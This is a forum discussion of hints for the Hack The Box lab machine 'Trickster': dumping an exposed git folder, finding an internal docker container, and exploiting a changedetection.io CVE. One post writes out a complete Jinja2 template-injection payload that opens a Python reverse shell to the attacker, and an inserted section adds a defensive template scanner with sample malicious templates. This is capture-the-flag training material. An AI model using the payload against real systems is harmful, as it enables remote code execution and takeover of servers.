Trickster Discussion [HTB] [HINTS]

Is the changedetection web app the IP and port that only gives a 404?

It probably broke and didn’t download the folder, or you’re not checking the folder that it needs to be downloaded in.

This is what I did to make it work, because I also received a timeout so it wouldn’t download the full git folder.

./git-dumper/git_dumper.py http://shop.trickster.htb/.git/ gittrickster -j 12 -r 5 -t 5

Thanks, got the directory now…

How do you find the changedetection? I can only find a port, but it only gives a 404.

The abs path of bash is /usr/bin/bash. You can revise the payload in the notification template which is uploaded from the exploit.

Scan the internal docker network. Guess the IP address. There’s more than one container. The one that always gives 404 is a rabbit hole.

Run arp -an to get all the known IPs in the ARP table. This is how I got 172.17.0.2.

Thanks, I did another trick:
check ifconfig, then check the IP of docker, and then just ping the IP 1 up, and if it responds, try to curl the default port.

So for example: docker port is 127.0.0.1, then just ping 127.0.0.2; if it gets a response, do the curl port check. If not, just go to 3 and so on.

This script doesn’t upload the notification shell, and when I update it myself it doesn’t get triggered somehow.

Any hint here to escalate privileges?

What an annoying and frustrating box again!

The root CVE isn’t working at all; it’s not placing the rev shell, and when I place it myself it’s not getting triggered.

Carefully read all logs from the container application and edit the exploit accordingly.

Also you need to craft a dummy notification URL. Check the documentation for it.

Hello, please, how did you get the version number?

Ok, got it now :partying_face:

For the people that have issues:

The notification body isn’t added with the CVE script, so I had to do it myself.

listen_ip="your_ip"
listen_port=9003
print(f"""
        {{% for x in ().__class__.__base__.__subclasses__() %}}
        {{% if "warning" in x.__name__ %}}
        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
        {{% endif %}}
        {{% endfor %}}
        """)

netcat on 9003
Go to the changedetection website and edit the just-added website → notifications, add notification URL test - get://kali_ip:9001/test

The URL is just a Python http.server.

Then fill in a notification title and copy-paste the payload that you receive from the script above. Then just press the send notification button.

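Seen from the defender's side, the payload posted above is a Jinja2 template that walks object internals from inside a notification body. The following is an added example, not part of the thread and not changedetection.io code: a static triage of stored notification templates. The function names, the verdict labels and the sample templates are constructed for illustration.

```python
import re

# Jinja2 expression {{ ... }} and statement {% ... %} blocks
BLOCK_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)
# Dunder names, whether reached as .attr or ['attr']
DUNDER_RE = re.compile(r"__[A-Za-z]+__")
# Names that mean code execution once object internals are reachable
EXEC_RE = re.compile(r"\b(popen|system|subprocess|eval|exec)\b")


def scan_template(body):
    """Return (reason, snippet) findings for one notification template."""
    findings = []
    for m in BLOCK_RE.finditer(body):
        inner = (m.group(1) if m.group(1) is not None else m.group(2)).strip()
        dunders = sorted(set(DUNDER_RE.findall(inner)))
        if dunders:
            findings.append(("dunder-access:" + ",".join(dunders), inner[:60]))
        if EXEC_RE.search(inner):
            findings.append(("exec-primitive", inner[:60]))
    return findings


def triage(templates):
    """Map template name -> 'block', 'review' or 'ok' (labels are hypothetical)."""
    verdicts = {}
    for name, body in templates.items():
        reasons = [reason for reason, _ in scan_template(body)]
        has_dunder = any(r.startswith("dunder-access") for r in reasons)
        if has_dunder and "exec-primitive" in reasons:
            verdicts[name] = "block"    # introspection plus an execution sink
        elif reasons:
            verdicts[name] = "review"   # introspection only, needs a human look
        else:
            verdicts[name] = "ok"
    return verdicts


# Constructed samples: one ordinary body, two with the shape seen in the thread
SAMPLES = {
    "benign": "{{ watch_url }} changed at {{ current_snapshot }}",
    "introspection": "{% for x in ().__class__.__base__.__subclasses__() %}"
                     "{{ x.__name__ }}{% endfor %}",
    "execution": "{{ x()._module.__builtins__['__import__']('os').popen('id').read() }}",
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name}: {verdict} {scan_template(SAMPLES[name])}")
```

Static matching like this is a triage aid for templates already stored; it does not replace rendering user-supplied templates in Jinja2's SandboxedEnvironment.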

How did you find the docker with changedetection?
I’m currently logged in as james - can you give me a hint?

Use ifconfig, try to find the docker interface.

How was I unable to see this… thank you!

Any hint to escape from docker?

Check the Linux user files.
It’s much easier than you think.

I had trouble using this PoC:

With the other PoC script and manually triggering the shell by clicking test notification URL, my shell popped.

Getting root was easy though :smiley: